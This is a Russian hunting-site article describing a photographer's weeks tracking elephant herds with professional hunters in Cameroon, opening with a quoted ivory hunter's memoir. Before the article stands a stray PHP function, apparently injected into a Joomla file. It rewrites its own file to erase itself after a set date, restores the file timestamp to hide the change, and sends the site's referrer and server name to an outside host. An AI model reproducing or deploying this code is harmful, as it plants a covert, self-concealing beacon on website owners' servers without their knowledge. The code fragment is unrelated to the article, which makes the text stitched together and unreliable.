check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ОХОТА НА СЛОНОВ В ЦЕНТРАЛЬНОЙ АФРИКЕ

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3212 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

ОХОТА НА СЛОНОВ В ЦЕНТРАЛЬНОЙ АФРИКЕ

Текст: Василий  Климов

ОХОТА НА СЛОНОВ В ЦЕНТРАЛЬНОЙ АФРИКЕ

… «Трубный, леденящий душу звук ярости заглушил все вокруг. Второй самец появился там, где только что были следопыты. Он был полон решимости, человеческий запах витал повсюду, не было только определенного объекта. Не отводя взгля­да от слона, я нащупал ружье, лежащее на земле, и стал аккуратно его поднимать, чтобы не привлечь внимания. Слон стоял от меня в пят­надцати шагах. Его уши были широко расправлены - он слушал, пыта­ясь определить, где спрятался враг. Резкий щелчок задетой стволами ветки стал стартом к нападению. Слон развернулся на месте, словно юла. Меня всегда удивляло, как такое огромное животное может бук­вально на месте развернуться на сто восемьдесят градусов. Вроде только что был зад, и вот перед тобой уже морда. Глаза налиты кровью, хобот завернут к груди. Разделяющее нас расстояние он покрыл за секунды. Я не успел даже вскинуться. Я нажал на курок в момент, когда слон уже был надо мной. Пуля удачно прошла сквозь нижнюю челюсть и вошла в мозг. Он умер до того, как шумно повалился на землю. При падении тя­желый хобот зацепил мою голову. Удар пришелся в левую бровь. Она рас­секлась, и кровь залила лицо. Резкая боль в правой кисти оповестила ме­ня, что что-то случилось и с рукой. Я не ошибся. Указательный палец был сломан скобой при отдаче, еще с трех свезена кожа, и все в крови. Вроде больше никаких повреждений. Я медленно поднялся, но, сделав несколько шагов к первому гиганту, осел. Меня всего колотило. Я попытался скру­тить сигарету, но ничего не получалось. Я поглядел на слона. Он лежал на боку там, где я его видел в последний раз. Это был настоящий тро­фей. Несмотря на стресс, я более детально осмотрел бивни - фунтов по сто пятьдесят каждый, не меньше.

Я всегда боялся во время охоты, но в последний момент страх уходил. Сейчас я впервые чувствовал что-то особенное, чего я до этого не испыты­вал никогда. Я закрыл глаза. Передо мной стоял нападающий слон. Что со мной? Где гордость и уверенность после сделанного? Рядом лежит та­кой гигант, а я не чувствую ничего, кроме пустоты и сожаления. Сколько я их убил? Наверное, сотен восемь, девять, а может быть, счет уже пере­валил за тысячу. К черту! Я никогда не считал, в отличие от других охот­ников. Мне было на это наплевать, меня интересовала только кость. Да, кость, желтоватая грязная кость. Ради нее я превратился в убийцу этих благородных созданий. В чем их вина, что там, наверху, им даровали бивни. Убивая, я всегда искал оправдание – мы имели равные шансы, но мне повезло больше. Слоны нападали на меня раз десять-двенадцать. Дважды они до меня добирались. Один раз обошлось. Гигант лишь от­бросил меня в кусты ярдов на десять. Другой был более серьезный. Разъ­яренный слон пропорол меня бивнем и проломил грудную клетку хобо­том, но я выжил и не отказался от охоты. Наоборот, я стал безумен – убивал, убивал и убивал. А что сейчас? Мне нехорошо от одной мысли об этом, мне чертовски их жалко. Будь проклят тот, кто придумал шары для бильярда и клавиши для пианино, будь проклят! Куда катит­ся мир?!»    …Неизвестный охотник (Павел Кикин. «Охотники на слонов»).

х                           х                          х

…Охота на слонов всегда была, есть и будет одним из самых опасных занятий человека-охотника в мире! Мест, где она еще осталась, не так уж много. Мне удалось наблюдать несколько таких охот в Африке, в Северном Камеруне. Почти месяц, как натуралист и фотограф, провел я в лагере профессиональных охотников на крупных диких животных.  В этом мирке все осталось как и раньше, в Х1Х веке - белые охотники-профи (ПиЭйч), живущие ради Охоты, богатые клиенты, мечтающие о сумасшедших трофеях, само оружие, африканцы, - носильщики и следопыты-трекеры, экипированные в военные лохмотья, бесконечные сафари, выслеживание зверья по лесам и саваннам,  ночные бдения на привадах, азарт, погоня, стрельба, и тд. Наша охотничья зона (арендуемая у правительства Камеруна) находится  недалеко от Национального Парка Бенуэ, в верховьях одноименной реки. Это плоскогорья, севернее гор Адамава, покрытые высокотравной саванной и сухими редкостойными лесами. Все это густо насыщено различным зверьем, которое мы и выслеживаем! Слоны, - одни из главных наших обьектов!

х                             х                               х

…Ранним утром, погрузившись на грузовой джип Тойота, мы едем на одно из первых моих сафари. Я сижу на мягком сиденье, за кабиной водителя. Передо мною, на решетке кабины висят три карабина, рядом сидит ПиЭйч, а сзади стоят два следопыта-африканца. Мы двигаемся среди редколесий, в обрамлении листвы и беспредельных «разливов» слоновьей травы.  Вот, следопыты показывают мне – «смотри, смотри, - жирафы!» Я таращу глаза в указанном направлении, в это переплетение веток, листвы и стволов, потом смотрю в оптику, - никого! За деревьями и ветками их совсем не видно! Где же они? Да вот! Бегу в буш, что бы снять их поближе. Да куда там, - жирафы «учистили» вверх по склону так лихо, что только мелькнули пятнистые задницы за деревьями!

Встретили справа двух бубалов. Огромные темно-желтые рогачи понеслись вскачь, как только мы встали. Пробежав метров 30, они встали за кустами и рассматривают нас. Это общий порядок реакции зверя. Он напуган, бежит метров 20-30, останавливается, поскольку ему интересно, - что это там такое? Причем встать всегда пытается хоть за каким-то укрытием и редко на открытом месте.

Опять останавливаемся. Следопыт указывает на …солнце и твердит – «Элефант, Элефант!». Слоны!? Но где же они? Передо мною зеленая стена леса и даже в оптику ничего не видно. Тем более, против солнца!

Потом вижу - на просвете солнечных зайчиков и самого светила, над лесом поднимаются клубы …пыли! А она - от стада слонов! Сева заряжает слоновий «зверобой», трекеры сами уже двигаются в том направлении, - идем тропить великанов! Догоняю следопыта и обгоняю его, что бы он не заслонял простор и перспективу. Впереди, под деревьями, ворочается целое огромное стадо в 30 или 40 слонов. Слышен активный треск ломаемых стволов деревьев и шелест травы. Мне в оптику видно, как Слоны поднимают хоботы, захватывают ветки с листьями и отправляют их в рот! У некоторых самцов видны отличные бивни! Здесь много малышей, они толкутся и путаются под ногами у гигантов. Несмотря на то, что мы прячемся за стволами, слоны нас увидели, самцы звучно и тревожно затрубили. Мы встали. Элефанты повернулись и …пошли на нас! Впереди огромный самец. Он поднял голову, пристально рассматривает возможную опасность и топырит уши. Мы замерли, -  каждый за свои деревом! До них метров 30. Ситуация критическая, сейчас решается момент - они будут нападать или только попугали нас и уйдут?! Сева мне шепчет сзади: - «Давай назад!» Киваю в ответ – «Да, да, сейчас!» А сам остаюсь, прячась за дерево, жадно смотрю в оптику, как они двигаются, о чем-то своем переговариваются, утробно рыча, матери и малыши общаются, трогая друг друга хоботами. А вокруг нас разлито зеленое блаженство и спокойствие! В этот момент слоны медленно разворачиваются к нам крупами и двигаются уже от нас! Слонята, помахивая хвостиками, стараются не отставать от матерей. Как какие-то лесные мистические существа шевелятся они темными тенями в контражуре, среди листвы и стволов деревьев. Вся их жизнь проходит в лесу и им не нравится, когда кто-то их беспокоит. Вот они уходят и только оседающие клубы пыли, играя светом в солнечных зайчиках, остаются в прогалинах, напоминая нам о необыкновенных существах, которых мы только что видели…

Чуть проезжаем вперед, вьезжаем на пригорок и видим, как сзади, над лесом, где мы только что были, поднимаются клубы темной пыли! Это Природа таким образом реагирует на присутствие толпы слонов, которая оставляет за собой пылевой след!

х                              х                               х

После обеда выезжаем на сафари в буш. Меня, вместе с местным африканцем, - следопытом Сайду, ПиЭйч Сева высаживает из джипа у реки и уезжает, вместе со своими трекерами. Мы здесь сегодня ищем гиппопотамов и крокодилов. Заберут нас только вечером.  Карабин (для встречи со львами) нам опять  не дали, но у Сайду всегда при себе длинный ритуальный кинжал! У него суданский тип лица и он у местных следопытов важный «перец» - родственник самого Ламидо - Отца всех фульбе (местный африканский Султан)! Недавно Ламидо осчастливил его деревню - подарил бегемота (который жил себе в реке и ни о чем таком даже не знал!). Так вот, Сайду сам сел в утлый старенький челн, подплыл к бегемотам, пускавшим пузыри посреди реки и копьем(!) убил самого главного из них! Деревня его пировала два дня! Оказывается, сегодня туземцы сами не могут никого убивать в саванне! На все нужно разрешение официальных властей, Султана или лицензия!

Расставшись с машиной, а по сути и с цивилизацией, я сразу же становлюсь Диким человеком! Подхватив удобнее телевик, ныряю в колючие заросли и выхожу к реке. Как только моя голова медленно, но верно показалась над приречными кустами, с отмели на глубину метнулся огромный крокодил! Волна так и пошла по всей реке, а по дну мелькнула его растопыренная тень! Вот это зверюга! Спускаемся с Сайду вниз, к воде. Высматриваем  следы крока и его друзей под берегом, вдоль реки, но нигде никого не видно. Видимо, лег  на дно! Вспоминаю, что именно здесь я купался пару дней назад! Вот так вот, можно искупаться навсегда!

Идем вдоль обрыва, звериными тропами, вьющимися в зарослях сухой, жесткой как проволока, слоновьей травы. Вдруг впереди, в рощице, слышна возня и резкий трубный голос слона!  Он как бы пытается дуть в пионерский горн! Мы стоим как раз на обрыве, а под нами - русло высохшей речки, по которой они выходят к большой реке, на водопой, судя по огромному количеству слоновьего навоза внизу! Замираем…

Сайду тревожно смотрит по сторонам и показывает, - стоим здесь! Замаскировавшись в траве, ждем слонов. Проходит минута, другая, третья. Над рекою разлилось молчание, только щурки мечутся над обрывом, в лесу - тишина. Сайду знаком показывает мне - вперед! Спускаемся в сухое песчаное русло реки, со всех сторон закрытое колючими зарослями. Проход к воде слоны пробили своими телами только по центру русла. Справа, за высоким берегом, слышна возня и сопение! Там слоны! Сайду выразительно, как оракул, показывает рукой вверх. На четвереньках, как разведчик у чужих окопов, поднимаюсь по склону и, лежа на животе, на самом гребне, вижу, как между стволов в маленькой роще, ворочается стадо слонов. Их очень много! Мне снизу видны только ноги, животы, крупы и хоботы. Стоит чуть подняться вверх, как листва и ветки деревьев перекрывают обзор. Воздух здесь, в густом лесу, как бы застоявшийся и нестерпимо пахнет слоновьим «духом». Ползу на локтях вперед, удерживая перед собою свое «оружие» и вспоминая армейские навыки. Сайду «подстраховывает» сзади. Сидим вдвоем под деревом, в густой тенистой роще, под пологом тропического леса, а впереди, в таинственной зеленой темноте, живут своей жизнью африканские великаны. Они видимо, здесь на отдыхе, потому что не слышно треска ломаемых веток и деревьев, что происходит при их кормежке! Судя по кучам сухих слоновьих фекалий, это их постоянное место полдневного отдыха. Каждый из элефантов занимается своим делом, - кто-то просто стоит рядом с другом и обмахивается ушами как веером, малыш сосет мать, оттопырив хоботок, а один из великанов обсыпает себя пылью.

Потихоньку продвигаюсь вперед. До них не более 20 шагов(!), снимаю, что могу, но здесь очень темно. Вокруг меня, - стена древесных стволов и между ними мне видны только части слонов, - хоботы, головы, уши, хвосты, крупы и тд. Целиком не вижу никого! Нужно подобраться еще ближе!? Но в этой тесноте от них, если они вздумают напасть, никуда не денешься и не убежишь. Растопчут враз (слон сходу ускоряется до 40 км/час)! Что делать? Оглядываюсь на своего проводника. Лицо у него напряженное и какое-то каменное. Видно, что он – на пределе! Но уйти от белого-«крейзи» он не может, поскольку отвечает за мою жизнь перед своими боссами!

Тут крайние слоны разглядели нас, затрубили, начали разворачиваться к нам крупами и уходить! Стало как-то тревожно и неуютно! Преследовать их в лесу, в темноте, да еще в этой тесноте, -  опасно и неумно! Появляется расслабляющая мысль, - «Что-то я уже снял, на сегодня пожалуй хватит, не будем больше рисковать нашими жизнями!»-

Показываю Сайду, - «Мы отступаем!». Он с благодарностью кивает и быстро так двигается назад. Его тоже можно понять, - у него семья, дети, хозяйство и рисковать жизнью ради каких-то там фото(!), а не ради мяса или денег, - это, по местным африканским нормам, просто глупо!

Выходим опять в сухое русло, потом на еле видную в траве колею, обходим по ней рощу со слонами. Вскоре, пройдя еще пару верст и пообщавшись с чудными обезьянками колобусами, спускаемся к реке. Здесь, у воды, встречаем своих. Поднимаемся на дорогу, к машине. Услышав о стаде слонов, стоящих на отдыхе, Сева решает их увидеть, что бы примерно оценить размер стада и наличие взрослых самцов. Он берет тяжелый карабин и мы шагаем по дороге обратно, к слонам.

Вдруг слышится трубный звук, еще один и над маленькой рощей поднимается …облако пыли, которое подсвечивает вечернее солнце, опускающееся за реку! Они!? Неужели?! В этот момент слоны, как бы услышавшие наши душевные чаяния, - «Ну покажитесь!», начали выходить из леса на дорогу и споро проходить дальше, в саванну!

И вот, мы все стоим, прячась за дерево и друг за дружку, на лесной дороге, а перед нами разворачивается такое необыкновенное действо - из леса, из под сени высоких вековых деревьев, в саванну, один за другим, вместе и порознь, выходят огромные голубые слоны! Их около тридцати взрослых и с ними много малышей. Подобно шарикам, они катятся следом за матерями, трогая их своими игрушечными хоботками и помахивая хвостиками! А взрослые, прекрасно видя нас на дороге (и видимо справедливо считая злобными карликами), спешат уйти, прикрывая малышей своими телами! Перейдя дорогу, они заходят в заросли высоченной слоновьей травы и буквально растворяются в ней! Голубыми они были, видимо из-за клубов пыли, окружавших их со всех сторон. Зрелище фантастическое! И даже какое-то нереальное! Как будто бы мы, -  древние дикие охотники Плейстоцена, - маленькие и перепуганные человечки, на опушке Древнего Леса встречаем стадо гигантов саванны, на которых восторженно смотрим снизу вверх! А они, не обращая внимания на пигмеев, степенно и гордо шествуют мимо!

Прощайте, гиганты Африки! Пусть у вас все будет хорошо!

Понимая, что слоны от нас уходят и мы их уже не увидим, бегу к месту, где они переходили дорогу и смотрю им вслед, надеясь, видимо, что они обернуться и помашут мне чем-нибудь. Но они не оглядываясь, подталкивая хоботами малышей, споро и быстро уходят в буш, оставляя в душе состояние какого-то восторга и тоски… Что-то будет с вами в этой современной, набитой машинами и людьми, Африке, где вы никому не нужны, а только мешаете всем...

Поскольку в погоне за слонами я выскочил за «линию огня», то заслужил порицание Севы. Если бы самец повернул на нас и стал атаковать, ему бы пришлось стрелять, а я был как раз между ним и слонами!

х                             х                               х

…Сегодня особенный выезд на сафари, - на слонов! Севе нужно закрыть лицензию, а тут и охотник есть, - Михаил из Москвы. Выезжаем в 6 часов утра. Тихо и сумрачно. В 6-30 солнце только-только показалось над дальними горами, золоченым диском. Еще прохладно, даже холодно. Особенно ребятам-африканцам, в легких курточках. Едем по невысоким горам, через буш и редкостойные леса. По сторонам разворачиваются фантастические по красоте виды долин, красивых полян, дальних синих гор, заросших лесами. Вдруг, джип резко останавливается, - поперек дороги лежит огромное поваленное дерево, вывороченное с корнями, - это «поработали» слоны. Таких лежащих гигантов-деревьев здесь - валом, на каждом шагу. Как в шутку говорят в лагере, - «Убей слона и сбережешь гектары ценного камерунского леса!» Через полчаса езды следопыты видят следы стада слонов, перешедших недавно нашу дорогу. Они останавливают машину, о чем-то совещаются. Вот, все дружно собираются, кто-то вооружается, кто-то берет рюкзак с водой, мы покидаем машину и, - в путь. Впереди шагают, внимательно обследуя землю, два следопыта,  потом - Сева с карабином на плече, за ним Миша, с оружием,  потом я и замыкает колонну носильщик с рюкзаком, несущий в нем термосы с водой. Двое следопытов шагают впереди, как ищейки обследуют каменистую землю, как-то находят следы стада и мы двигаемся дальше.

Казалось бы, - по саванне, среди высокой травы и зарослей прошло стадо слонов, голов в 40-50! Да они должны бы проложить за собой дорогу! Ничуть! Прошли они мягко, неслышно, как тени, звериными тропами, почти не оставив следов. Как я ни всматривался, но кроме свежего навоза, нескольких сломанных деревьев, мокрых и голых ошкуренных веток, ничего за ними увидеть не могу. А следопыты видят все, мышь не проскочит!

Само состояние мое необыкновенное и приподнятое! Подумать только, - в сердце Экваториальной Африки, вместе с охотниками и черными следопытами, по камерунским лесам, я преследую стадо слонов! Об этом можно только мечтать! Просто невероятно! Фантастика! Сильно пахнет пылью и слонами, тут и там  встречаются их большие навозные шары, - по одному, по двое, по трое и сразу целыми кучами!

Через полтора часа бодрого шага по горам, переходим гребень лесистого холма, останавливаемся перед лощиной, заросшей маленьким и кривым лесом. Трекеры показывают нам, - вот они, слоны! За густой зеленью тех почти не видно, но следопыты видят не только первый и второй план, но  также третий и четвертый. С трудом начинаю различать среди зелени черные далекие тени. Начинаем медленно приближаться, старательно прячась за деревьями. Трекеры постояно сыпят из пальцев пыль, определяя направление ветра. А его все нет! Под пологом тропического леса жарко и душно! Соленый пот заливает глаза, потеют руки, держащие оптику и оружие. Перед нами большое стадо и как оно поведет себя, - никому не известно!

При подходе ближе и ближе я, наконец-то, вижу сначала какую-то огромную серую массу, которая переваривается между стволов деревьев, как мясо в мясорубке. Потом начал различать хоботы, уши, глаза! Отдельных слонят! Они пока нас не видят и спокойно пасутся. То и дело слышен треск ломаемого дерева! Уперевшись поднятым хоботом в деревцо, слон поднатуживается и валит бедное растение наземь, а потом обдирает как липку, - до голого ствола. Причем, зеленые листья и нежная кожица веток, - их главное лакомство!  Так они достают свою еду! Стоим, сгрудившись  за деревом, рассматриваем стадо и его жизнь! Слоны перемещаются туда-сюда, детки общаются с матерьми, взрослые валят деревья, потом ошкуривают ветки, пропуская их через зубы, жизнь кипит ключом. В какой-то момент слоны поворачиваются к нам хвостами и …начинают уходить! Мы медленно двигаемся за ними. Стадо все время находится в «броуновском» движении, - одни животные подходят, другие уходят, все постоянно перекрывают друг друга, их к тому же, закрывают все время стволы и ветви деревьев! К тому же, элефанты поднимают клубы пыли, которая все закрывает, а потом опять оседает на них, листьях и ветвях деревьев.

Мы все время находимся под прессом нескольких, совершенно противоположных по направлению, стимулов. С одной стороны, - что бы найти нужного нам зверя-великана, мы должны его увидеть, а для этого нужно подойти ближе! Но, подойти к стаду незамеченными просто невозможно. А если они нас заметили и оценили как опасность, то могут в любой момент атаковать! Найти в этих условиях одного – единственного самца, с самыми огромными бивнями (а это - главная задача Охотников-На-Слонов), - работа просто невозможная! При этом, ошибиться никак нельзя! Власти страны не выпускают из страны бивни легче 5 кг! А если, не дай Бог, подстрелишь самку, то выложишь еще одну стоимость охоты! Продолжаем приближаться!

Мы и слоны - на одном склоне, но они несколько выше нас. Следопыты и охотники прячутся за чахлые деревца, которые для слонов, - что спички! Мне плохо видно животных, а хочется снять их лучше и я, естественно, поднимаюсь повыше и поближе к ним. Сева делает страшные глаза и показывает мне огромный кулак, - мол, ты провоцируешь слонов на нападение! Отступаю и тихо иду за группой. Стоим прямо перед ними, а внутри стада разворачивается своя жизнь. Кто-то ломает деревья и обдирает листву, кто-то общается с мамой и тд. Слоны, видимо, нас видят давно, даже где-то привыкли к нашему присутствию, поскольку мы пока особо не мешаем им и они продолжают жить своей жизнью и не обращают на нас внимания! Или просто те, кто определяют внутреннюю жизнь стада, - старые самки-вожаки, еще не озаботились нашим присутствием. Они разошлись по склону широким фронтом и охватили нас полумесяцем. Мы собственно, в середине стада. Я рассматриваю в оптику жизнь слонов то справа, то слева и кое-что успеваю снимать, ибо, - «шоу продолжается всегда!»

У каждого из нас в группе своя задача. Трекерам нужно вывести охотников на «нужного» им зверя, охотникам, - разглядеть зверя и изловчиться попасть в него, поскольку в лесу, среди деревьев, постоянно видна только его часть! Если видна голова, то тело закрывают стволы деревьев, если открывается тело, то прячутся шея, голова и круп! Такие же проблемы – полнее рассмотреть зверя и попытаться  его запечатлеть, стоят и передо мной. Мне   нужно хорошо снять стадо или отдельных животных (в идеале – портрет), во время каких-то интересных взаимодействий. Но если охотник решает свои проблемы одним хорошим выстрелом, то моя «сага» фотографа просто бесконечна. Всегда есть внутренний конфликт между тем, что получилось и тем, что могло бы быть! К тому же, в нашем смешанном сафари первенство за теми, у кого в руках более «серьезное» оружие (как мы все понимаем, я со своими «игрушками» здесь проигрываю).

Спускаемся ниже и обходим стадо так, что бы были видны все животные! Теперь слоны идут по гребню, мимо нас, совсем рядом, демонстрируя все свои достоинства. Охотники шепчутся и выбирают «бычка на заклание», а я снимаю с минимальных дистанций! Слоны даже не помещаются в мой видоискатель! В какой-то момент часть стада решила сократить свой путь в движении за вожаками и …пошла на нас! Мы в этот момент пытались поменять дислокацию и перебраться к дереву поближе! Но увидев, что слоны повернули на нас, все дружно схлынули вниз и спрятались за единственное худенькое деревце! Мы сейчас похожи где-то на голого короля, считавшего, что он невидимый!

Снимая слонов, я не забываю смотреть и за спутниками. В момент прохождения слонов рядом (причем было хорошо видно, что они взволнованы и обеспокоены нашим присутствием), черные следопыты все дружно …спрятались за белых охотников! Вот тебе и на, - и это отважные африканские воины?! Но они видимо, в отличие от нас, людей далеких от Природы, четко соображают, что ситуация критическая. Для них слоны - это реальная опасность для жизни, а люди с винтовками, - реальная защита. Они понимают, что от слона здесь не убежишь, и белые охотники, конечно же, будут стрелять, если слоны приблизятся слишком близко! Но, пронесло! Ветер был от них и слоны даже если нас и видели, не определили как серьезную опасность или угрозу! Оказывается, главное в этой Охоте, - не стать им Угрозой! Поэтому они спокойно прошли мимо, шагах в 50(!), что-то про себя утробно урча, подставляя для съемки (и пули) точеные профили, бивни, хоботы и тд. После их прохода  как-то полегчало, общее напряжение в группе спало и люди стали разговаривать в голос. Поскольку самцов с рекордными бивнями в стаде найти не удалось, решили не портить им жизнь и на сегодня охоту закончить! Как хорошо! Пусть они все живут!

Несмотря на то, что мы два часа бегали по горам, следопыты легко нашли все направления и местонахождение нашего джипа, скромно стоявшего в лесу. Шагаем к нему совсем другой дорогой. Садимся в машину, пьем воду,  вытираем мокрые лица, предвкушая хоть небольшой отдых! Многим из нас уже привиделся наш чудный лагерь на берегу реки, горячий душ, море напитков и разные яства!?

Но, не проехали мы и 100 метров, как трекеры всполошились. Оказывается, совсем рядом, в 200 м слева пасется другое …стадо слонов! Вот это удача! Пулей соскакиваем с джипа, охотники заряжают на ходу карабины. Идем вслед за следопытами и видим, что слоны - совсем рядом и только-только что были здесь! Выдает их присутствие множество сломанных стволов деревьев («как Мамай прошел», - говорят в народе), оторванных и обглоданных с кожурой веток и кучи еще мокрого, парующего слоновьего  навоза. Наученный горьким опытом, стараюсь держаться за охотниками.

Подходим ближе. Элефанты уже рядом! Со стороны стада слышен постоянный  треск и столбом клубится пыль. Это они ломают деревья и объедают листья. Вот, видимо, они почувствовали нас, потому что началось движение. Слоны понемногу покидают долинку и переходят дальше. Мы  крадемся следом, - от одного дерева до другого! Сложно снимать, когда из-за деревьев видны только части слонов! То голова с хоботом, то круп, то середина тела, то только хвосты. Последних больше всего.

Наконец, по разреженному светлому лесу, мы подошли совсем близко. Слоны расположились под деревьями прямо перед нами, до них метров 30-40. Они заняты каждый своим делом, - этот ломает дерево, тот обдирает сломанное, третий посыпает себя пылью, четвертые, молча, стоят рядом. Все стадо благодушно кормится на пленере, не обращая на нас никакого внимания! Слева группа слонов встала на отдых в тени огромного развесистого дерева. Глупый, годовалый слоненок подошел совсем близко, метров на 20 и турзучит хоботком крону невысокого деревца. Мы уже хотели отступать, но следопыты успокоили, - от малыша опасности ждать не стоит! Мне неудобно его снимать за стволами и Сайду (который чувствует себя комфортно в любой ситуации и уже давно удобно устроился на камне), видя это, уступает мне место рядом с собой, на горячем валуне! Сажусь, рассматриваю в оптику голову, глаза, уши малыша, как вдруг раздается трубный мощный глас и все стадо, в едином порыве …помчалось прочь! Когда звучит тревожный глас, поданный кем-то из вожаков, слоны не раздумывая, в общем порыве и стрессе, несутся все вместе прочь, сметая все на своем пути! Вот тебе и на! Обидно до слез, - так долго и тщательно подкрадывались и все напрасно! И ветер-то - от них! Но, как сказал потом Миша, - ветер в горах постоянно крутит и мог донести до них наш запах, оставленный прежде! Слоны рванули вперед, в следующую долину и мы опять их догоняем…

Стадо  поднялось на плоский лесистый холм и как-то растеклось от вершины к подножию, образовав  подобие полусферы. Поскольку охотники постоянно оценивали то одного, то другого, выискивая самого-самого «бивневого», им было выгодно занять господствующую высотку и уж оттуда всех увидеть, выбрать и нанести решающий удар! Крадусь за остальными, но автоматически высматриваю - куда отступать! Вот стоит серьезное дерево, а вот, - высятся россыпи валунов, - уж там меня никто не достанет! Подкрадываемся к вершине. Слоны ломают деревья по обе стороны холма и кажется, нас не замечают. Стадо большое, здесь более 50 взрослых элефантов. Но вот, что-то мимолетно изменилось, видимо переменился ветер и донес им наш запах! Послышался характерный трубный глас, извещающий о Тревоге и все стадо опять… кинулось прочь. С маленьким добавлением. Направление их движения было таковым, что левый фланг стада неминуемо должен был бы пронестись по нашей плоской вершинке! И наша группа, естественно (совершенно невзначай), оказалась у них на дороге!

Вдруг мы все разом, как-то очень близко от себя, увидели какую-то огромную черную «Стену», - стадо Монстров! С огромными, растопыренными черными ушами, мотающими на ходу хоботами, на нас разом неслось напуганное чем-то стадо слонов! А за ними стеною поднималась густая, почти черная, завеса пыли!

Постоянно, во всех ситуациях,  отслеживая лица и поведение всех наших охотников, я неожиданно увидел, как у черного как ночь следопыта вдруг …побелело лицо, как-то очень быстро забегали глаза, он закричал что-то, -  тревожно и отрывисто, по своему, - то ли нам, то ли своим! «Бежим!», - перевел уже на ходу его слова Сева, перехватывая карабин в правую руку и,  мы все дружно… рванули в сторону, вниз по склону!

Но мне очень хотелось снимать все это, - бегущих людей, надвигающихся слонов, поэтому на бегу я попытался остановиться, что бы прицелиться назад, но …запнулся о корень и кубарем покатился вниз по склону, по опавшим листьям и белесой стерне из слоновьей травы! Но, оптику не выронил и даже не позволил ей коснуться земли! Тут же вскочил как мячик и помчался вслед за своими черными и белыми бойцами, лихо несущимися по саванне! Наконец, промчавшись метров 50, все мы сгрудились за хилыми деревьями и с трудом начали приходить в себя! Да, побегали! А мимо нас, прямо по тому месту, где мы только что стояли, в клубах черной пыли, ломая  и калеча на ходу деревца, промчалось стадо слонов… - «Теперь они не скоро остановятся, идти за ними нет смысла», - сказал старший следопыт.

Как мне кажется, африканские охотники-туземцы вообще более близки к Природе, чем мы, евразийцы. И инстинкты самосохранения у них поэтому развиты гораздо выше! А мы вообще ничего не боимся! Мне например, всегда хотелось снимать слонов прямо в стаде, как я снимал когда-то в стаде роды у бизонов, будучи даже без лошади! И здесь, - если бы не охотники, то я точно, уже был бы в стаде! Но бизоны, - не слоны. Они готовы признать хоть какую-то силу над собой. Дикие слоны, - совсем не такие! Для них еще не придумано силы и Власти выше их, которая могла бы встать перед ними! Поэтому, все наше «бесстрашие» происходит от нашего неведения, глупости и непонимания серьезности опасности! Которую так отчетливо видят африканцы. Уж они-то точно знают, насколько опасен атакующий элефант! И здесь у них нет никаких иллюзий! Это мы, живущие далеко от Африки, идеализируем эти создания, мол, они умные и добрые! Умные, - да, но далеко не добрые. Скорее, - умные, памятливые и жестокие! Слон в саванне безоговорочный властелин и хозяин! Никто не рискнет встать на его пути! Он идет по лесу, все сметая на своем пути, - кусты и деревья. Так же разъяренный слон ведет себя, попав в деревню туземцев. Он рушит хижины, гоняется за людьми и оставляет после себя полную разруху! Особенно ярятся слонихи и взрослые самцы, если чувствуют угрозу и опасность для стада и слонят, исходящую от людей.… А в этих краях, где на них еще и охотятся, они опаснее втрое и никому ничего не прощают! Озлобленного, разъяренного зверя ничто не сможет остановить и он не успокоится, пока не превратит своего врага в кровавое мессиво!  Так, в Кении, в 1990—1993 годах слонами было убито 108 человек; в Зимбабве с 1982 по 1989 г — 500 человек!

х                      х                       х

Выезжаем рано, - снова на слонов. Едем в те же места – на юго-запад, вдоль реки. Следопыт указывает мне рукою влево. На поляне, среди высокой травы, стоит небольшое стадо лошадиных антилоп. Их здесь 5 или 6! Они стремятся уйти, но в тоже время им интересны и мы, они останавливаются, разглядывают нас. Успеваю снять группу и портрет! Огромный хохлатый орел слетает с ближайшего дерева и планирует на следующее. Подкрадываюсь к нему, прячась за деревьями. Он гордо оглядывает окрестности, подергивая перьями своего длинного хохолка. Это видимо, гребненосный орел!

Очень быстро следопыты находят свежие следы стада слонов, пересекающие дорогу, мы собираемся и вот уже идем по его следам. Слоны близко, поэтому все идем аккуратно, стараясь не шелестеть сухой травой и ветками, вслед за следопытами, подкрадываемся. Ветер от них и солнце тоже, - светит нам в лицо. Сквозь стволы и ветки в контражуре видны темные силуэты, освещенные утренним солнцем чуть сбоку. Они спокойно пасутся среди редколесий, захватывая хоботом, пригибая ветки и пропуская их через рот. Но вскоре они нас заметили и начали уходить. Теперь нам видны только их крупы и хвосты, которые мне снимать совсем не интересно. Малыши спешат за матерьми, аж спотыкаются! Мы тоже двигаемся  вслед за стадом, перебегая от дерева к дереву.

Вся внутренняя жизнь стада слонов напоминает неуравновешенную синусоиду и состоит из двух моментов: расслабления и напряжения, (все как у нас - «белое-черное»)! Первое, самое основное и приятное, - это часы отдыха, пастьбы, спокойных переходов, водопои, без присутствия и воздействия угрожающих факторов. Второе, - тревога и жизнь в условиях стресса, вызванного Опасностью, которая проистекает всегда извне, - от людей и хищников. Но, большому стаду элефантов в Африке никакие хищники не страшны, поэтому опасность идет только от нас!

Как любой живой организм, стадо стремится ослабить или даже сбросить это напряжение, поэтому всячески уходит из зоны нашего воздействия, пытаясь обрести покой, безмятежность и безопасность. Но есть еще две формы поведения, вызываемые стрессом – паническое бегство и атака! Уже напуганное (занервированное) стадо подхлестывается тревожным сигналом Вожака к отступлению! Оно все теперь охвачено единым порывом, психозом и летит прочь, не разбирая дороги! Но, и это не худший вариант. Вот если бы прозвучал сигнал к атаке, тогда бы нам пришлось совсем туго!

Но, самое удивительное создание во всей этой истории, – это сам человек! При всей явной опасности «игр» с дикими слонами, мы …продолжаем наступать! Если мы будем очень настойчивы в своем стремлении видеть их (при этом, - не будем причинять им вред), они в конце концов, вынуждены адаптироваться и, свыкаются с нашим присутствием! Этого-то мы и добиваемся, находясь с ними в длительном визуальном контакте.

Вот слоны рысью перешли в новую долину, опять расслабились, посчитав, что нас они потеряли, по стаду разлилась нега и они снова начали мирно пастись, изводя местную флору.

